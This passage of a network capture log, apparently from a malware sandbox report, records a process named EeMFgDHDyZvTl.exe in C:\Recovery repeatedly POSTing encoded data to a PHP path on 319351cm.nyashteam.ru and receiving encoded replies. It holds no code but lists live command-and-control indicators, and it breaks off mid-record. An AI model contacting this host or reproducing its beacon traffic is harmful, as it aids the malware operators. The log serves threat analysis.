Dec 6, 2024 03:12:26.870708942 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49765	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:27.180457115 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:27.530302048 CET	1008	OUT	Data Raw: 56 52 5a 5c 59 59 56 5f 5c 56 52 5a 50 5a 5a 51 58 5b 5b 58 50 55 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VRZ\YYV_\VRZPZZQX[[XPUVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"D= -\=/(/Z&2<T39*>041V2:?!4/=']/!Q!4
Dec 6, 2024 03:12:28.265367985 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:28.531339884 CET	805	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FuCQA6Xu91mL3c6gh0miNwWjoE6RV3vS71LPaXaPdmqqXfjFEMBkFTogOkQxq56WP1%2Fpqiujgopiq6Quutps0vCWifRmEK2ETEVukL6BNQtOF4meDnGm9wpNOTB1wyN1OUoo4UDTfOs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c04baa6f1891-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3701&min_rtt=1593&rtt_var=4815&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=79077&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49770	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:28.774818897 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:29.124038935 CET	1012	OUT	Data Raw: 56 5e 5f 59 59 59 53 59 5c 56 52 5a 50 5e 5a 52 58 5e 5b 5b 50 58 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V^_YYYSY\VRZP^ZRX^[[PXVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@(0>*",?6'^&5U%?U0+>>4 Y6%/\!+4;=']/!Q!0
Dec 6, 2024 03:12:29.866451979 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:30.135585070 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VIxadP1EowpEYzc4mvheOTySZfPibUoJayzm2lY1akhWO%2FqYNLoqr79WM0WHiqVKNC%2FOq3fvFp8Fk0Z1Uv6flpedcuQy3cwmAx0fVsK2HRVLbkXS560TGND4xoUJ1jUt65pAzaYwG%2FU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c055b8f48cdd-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2999&min_rtt=1796&rtt_var=3079&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=127845&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49773	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:30.383677006 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue
Dec 6, 2024 03:12:30.733330965 CET	1008	OUT	Data Raw: 56 5e 5f 59 59 5f 56 58 5c 56 52 5a 50 5a 5a 52 58 53 5b 5d 50 5d 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V^_YY_VX\VRZPZZRXS[]P]V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!=39X)3U?]&+%T%%+_)?[7Y-S168</']/!Q!8
Dec 6, 2024 03:12:31.669938087 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:31.911076069 CET	806	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Btvda%2Ftn1xovE7oYVSa96t2CvZat8t9RlCknsUAadsQprhvxmPOvP8fvpQywOnLGYQDZmEfmQulHwWTVOWZtKPBIck96fCmxJtjiEC9Tq3j1Ht6mrl4108J7bnY6HmcC4kIJC3TTYL0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c060dd061865-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=50359&min_rtt=47970&rtt_var=22767&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1281&delivery_rate=21763&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49777	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:32.082276106 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:32.436542988 CET	1296	OUT	Data Raw: 56 51 5f 58 59 5b 56 59 5c 56 52 5a 50 58 5a 50 58 5c 5b 59 50 58 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQ_XY[VY\VRZPXZPX\[YPXV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>0-Y=2#?5#[&9&'3;)*X,!,=U2?#((/']/!Q!(
Dec 6, 2024 03:12:33.216016054 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:33.478996992 CET	954	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Qmd2a78LgWqkHD8siTZccngPNAxeTbdlbK0Zreuwq0TwT3SVyW91VJbVXLqPMf1YSl7SRURxuipIKdF0BBdef6O2zPBino4860%2FSb1l%2F3P4K8RhLQQPe3qdc8xOlFmuHxeTWVH6bwM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c06a994f8c36-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4537&min_rtt=2035&rtt_var=5767&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=66210&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 5a 30 3e 2c 5a 36 1c 24 13 2e 00 0a 1e 31 3e 32 04 2e 28 02 1b 35 38 35 14 3c 06 2c 1c 24 42 37 58 3e 3c 08 01 3e 3c 3b 1d 29 12 23 5b 00 13 26 5c 3f 3d 00 1a 29 00 20 19 27 20 32 5c 2a 26 2a 10 28 2d 3c 0f 20 14 2e 04 35 13 2c 18 27 2d 30 0a 2c 25 23 04 28 19 2a 1a 31 34 21 5e 0e 11 3a 0d 32 1d 0c 58 23 38 20 0d 32 20 3c 1d 28 5f 30 58 26 2c 33 1d 2b 42 3f 0e 30 0f 3d 1f 30 3f 2f 0b 31 3a 3a 5b 21 2f 06 0c 2d 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Z0>,Z6$.1>2.(585<,$B7X><><;)#[&\?=) ' 2\&(-< .5,'-0,%#(*14!^:2X#8 2 <(_0X&,3+B?0=0?/1::[!/-<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49779	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:32.148740053 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:32.498985052 CET	1012	OUT	Data Raw: 56 53 5f 5d 59 5c 53 5c 5c 56 52 5a 50 58 5a 53 58 5d 5b 5d 50 5b 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VS_]Y\S\\VRZPXZSX][]P[VXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"(0[="/<$';5&W'^-?X ,525',']/!Q!(
Dec 6, 2024 03:12:33.288114071 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:33.538263083 CET	810	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg6w2eI9%2BaMb7XHxuDiI1t4Mr3GNA40Pxk63rE0I2BW520WsltEtQFmTbAYqs8GH5oRDS3c8V9aZwcV2Sbf0EwyFjLQTrOXjGgTQheXQ%2FMzIshO4JtO%2FPA96Bdxsf%2BYeWgyBD92zJfA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c06b19530f87-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2892&min_rtt=1664&rtt_var=3081&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=127022&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49784	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:33.804019928 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:12:34.155203104 CET	1012	OUT	Data Raw: 56 51 5a 5a 5c 5f 53 5f 5c 56 52 5a 50 5f 5a 5d 58 5d 5b 5f 50 5b 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQZZ\_S_\VRZP_Z]X][_P[V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"=0:>!/U<71-W%7U0;.[)>(7>&:+6(#/']/!Q!4
Dec 6, 2024 03:12:34.888533115 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:35.170236111 CET	803	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwWOwtxRHbmyDTliGYZcJ4g59POykmfngVPdYdfXb6Rw8qWFmEnSV1FmpO6MG76Zi52VYGzo0vQBgGe0dkWBfocV9l%2Fs5ZGSpEl0nic7VBIFb3J9XxJcGUTYZ1b5RvwYAHggiKSbHVU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c075188c42ce-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4073&min_rtt=1727&rtt_var=5341&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=71219&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49790	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:35.415251017 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:35.765289068 CET	1012	OUT	Data Raw: 56 50 5a 5d 59 5b 53 59 5c 56 52 5a 50 5c 5a 51 58 5f 5b 5f 50 5b 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VPZ]Y[SY\VRZP\ZQX_[_P[V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A>9>(>%\1]-2#R$8"[>+X#*2:5+;=']/!Q!8
Dec 6, 2024 03:12:36.501131058 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:36.779211044 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EsLhSo49GeqRsVuJwA%2FLI7qWRskr65K4aMpB5n6%2FcN0SzSmWoGfxdnpUYZLB1BBff%2Fck2DIzUKJyRd0at8UCRUa4fyutl4Qa7LJMf7id7t66xZW3LZ3lBt2BVEuTrBZKEHbtP6EOl6s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c07f29fe423b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3721&min_rtt=1665&rtt_var=4737&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=80582&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49793	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:37.049571991 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:37.405260086 CET	1012	OUT	Data Raw: 56 52 5f 51 59 50 56 5d 5c 56 52 5a 50 53 5a 54 58 5b 5b 5c 50 54 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_QYPV]\VRZPSZTX[[\PTV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!#1='T+%?%;!T14$"[X/ 22*#!;8;-']/!Q!
Dec 6, 2024 03:12:38.125881910 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:38.357676983 CET	813	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RB1DMF61CD9bynhU1mAXOVFQVjb8cN1o%2BTxfuRFgXowrCz4GlnHZmyF1nn409ADtyPeEK4TX%2FrJ05YOwNoBx13px3%2Bmgev0x32oexkNQ0Lf958ojIZ%2FMSErw%2BxUJOuaoIL5%2Buhf0ktk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0894bba17ad-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3581&min_rtt=1576&rtt_var=4602&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=82846&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49797	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:38.599977016 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:38.952039957 CET	1012	OUT	Data Raw: 53 53 5f 5c 59 58 56 53 5c 56 52 5a 50 52 5a 56 58 53 5b 5a 50 54 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SS_\YXVS\VRZPRZVXS[ZPTVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"( "=!<<+%+2U0+>= ,*2/\6+',-']/!Q!
Dec 6, 2024 03:12:39.766670942 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:40.068036079 CET	812	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=72INlRlv2sHRL3o%2BjsUSh6H0MKPe5KIbpTPxmShXDI47hKHl6fFUSzsMOL%2Bb%2BTXwXfeBhpd1XngsaLyyF28lV6OkQtixIC8S9Mopzj1k6w76tuh%2FDEsZwwypE8ifYRIcJBWscpMAeN4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0938a4cc407-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=31667&min_rtt=28789&rtt_var=16553&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=28174&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49798	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:38.604123116 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:38.952152014 CET	1296	OUT	Data Raw: 56 52 5f 50 59 5f 56 59 5c 56 52 5a 50 5f 5a 54 58 59 5b 5f 50 54 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_PY_VY\VRZP_ZTXY[_PTV]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C)-Z*+S+5%"1,;T02^(=< ,6&:,!;=']/!Q!4
Dec 6, 2024 03:12:39.768667936 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:40.052148104 CET	967	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhccVECspnZFwo2mhSb%2B2k%2BqNF0bDOJW6jLjQ8Xd33zaH0Cgzmag2d%2F9wG%2BZOznwneKiRqrTAJqrPVr%2F15dhcm2mU3YRslzB2ITKopajhKSUo2BRz1p8w33%2FqB1Aa4bnGVyKsi2z%2F6I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0939aea7cee-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=28158&min_rtt=25383&rtt_var=15070&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=30680&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 5b 24 2e 2f 00 36 32 38 59 2e 00 38 55 25 10 25 5b 3a 3b 3c 59 21 28 25 14 2b 11 27 0d 25 24 05 14 3e 3c 03 1d 3f 01 28 0c 3e 38 23 5b 00 13 26 5c 3d 2e 26 51 3d 39 20 16 31 55 2a 5d 29 35 22 5c 3d 2e 30 0a 21 2a 31 5d 21 03 30 1b 30 5b 38 0d 38 